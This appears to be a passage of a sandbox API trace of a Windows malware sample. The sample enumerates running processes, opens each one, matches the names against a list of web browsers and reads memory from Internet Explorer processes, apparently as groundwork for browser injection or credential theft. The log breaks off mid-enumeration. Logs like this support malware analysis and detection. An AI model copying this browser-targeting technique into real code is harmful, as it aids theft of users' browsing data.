	[0241.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.728] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0241.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.728] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.728] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0241.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.729] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.729] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0241.729] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x86e0
	[0241.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.730] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0241.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.730] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.730] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0241.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.731] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.731] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0241.731] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0241.732] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0241.732] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x86e4
	[0241.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.732] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0241.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.733] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.734] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0241.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.734] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.735] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0241.735] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x86e8
	[0241.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.736] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0241.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.736] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.736] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0241.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.736] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.737] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0241.737] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x86ec
	[0241.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.737] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0241.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.738] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.738] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0241.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.739] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.739] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0241.740] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x86f0
	[0241.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.740] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0241.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.740] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.740] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0241.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.741] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.741] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0241.742] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x86f4
	[0241.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.742] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0241.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.742] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.743] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0241.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.743] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.744] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0241.744] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x86f8
	[0241.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.745] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0241.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.745] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.745] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0241.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.745] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.746] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0241.746] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x86fc
	[0241.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.746] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0241.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.747] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.747] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0241.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.748] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.748] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0241.749] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x8700
	[0241.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.749] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0241.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.749] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.750] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0241.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.750] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.751] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0241.751] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x8704
	[0241.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.752] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0241.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.752] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.752] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0241.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.752] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.753] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0241.753] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x8708
	[0241.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.753] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0241.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.754] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.754] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0241.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.755] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.755] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0241.756] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x870c
	[0241.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.756] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0241.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.756] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.757] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0241.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.757] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.757] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0241.758] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x8710
	[0241.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.758] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0241.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.759] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.759] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0241.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.760] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.760] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0241.761] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x8714
	[0241.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.761] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0241.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.762] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.762] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0241.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.763] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.763] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0241.764] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x8718
	[0241.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.764] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0241.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.765] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.765] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0241.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.766] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.766] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0241.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x871c
	[0241.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.767] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0241.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.768] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.768] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0241.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.769] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.769] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0241.770] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x8720
	[0241.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.770] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0241.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.771] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0241.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.771] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0241.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.771] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.771] NtQueryInformationProcess (in: ProcessHandle=0x8720, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0241.772] ReadProcessMemory (in: hProcess=0x8720, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0241.772] ReadProcessMemory (in: hProcess=0x8720, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0241.772] ReadProcessMemory (in: hProcess=0x8720, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0241.772] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0241.772] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0241.773] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x8724
	[0241.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.773] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0241.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.773] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0241.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.773] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0241.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.774] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.774] NtQueryInformationProcess (in: ProcessHandle=0x8724, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0241.774] ReadProcessMemory (in: hProcess=0x8724, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0241.774] ReadProcessMemory (in: hProcess=0x8724, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0241.774] ReadProcessMemory (in: hProcess=0x8724, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0241.774] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0241.774] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0241.775] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x8728
	[0241.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.775] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0241.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.776] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.776] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0241.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.776] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.776] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0241.777] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x872c
	[0241.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.777] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0241.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.778] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.778] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0241.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.778] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.779] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.779] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x8730
	[0241.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.779] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.780] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.780] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.780] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.781] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.781] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.782] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x8734
